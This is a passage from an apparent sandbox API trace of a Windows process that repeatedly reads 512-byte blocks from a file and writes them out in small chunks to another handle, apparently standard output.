lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.212] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.212] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.212] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.213] GetFileType (hFile=0x50) returned 0x1 [0236.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.214] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.214] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] GetFileType (hFile=0x50) returned 0x1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.214] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.215] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.215] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] GetFileType (hFile=0x50) returned 0x1 [0236.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.215] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.216] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.216] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] GetFileType (hFile=0x50) returned 0x1 [0236.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.216] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.217] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.217] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] GetFileType (hFile=0x50) returned 0x1 [0236.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.217] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] GetFileType (hFile=0x50) returned 0x1 [0236.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.218] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.218] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.218] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.219] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.219] GetFileType (hFile=0x50) returned 0x1 [0236.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2cecc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cecc4*, lpNumberOfBytesWritten=0x2cdcc8*=0x20, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.220] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdcb4 | out: lpNewFilePointer=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=4) returned 0x58 [0236.220] ReadFile (in: hFile=0x58, lpBuffer=0x2ceae4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdcd4, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesRead=0x2cdcd4*=0x200, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2ceae4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceae4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb34*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2ceb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2ceb84*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2cebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cebd4*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] WriteFile (in: hFile=0x50, lpBuffer=0x2cec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec24*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, lpOverlapped=0x0) returned 1 [0236.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.220] GetFileType (hFile=0x50) returned 0x1 [0236.221] _get_osfhandle (_FileHandle=1) returned 0x50 [0236.221] WriteFile (in: hFile=0x50, lpBuffer=0x2cec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdcc8, lpOverlapped=0x0 | out: lpBuffer=0x2cec74*, lpNumberOfBytesWritten=0x2cdcc8*=0x50, 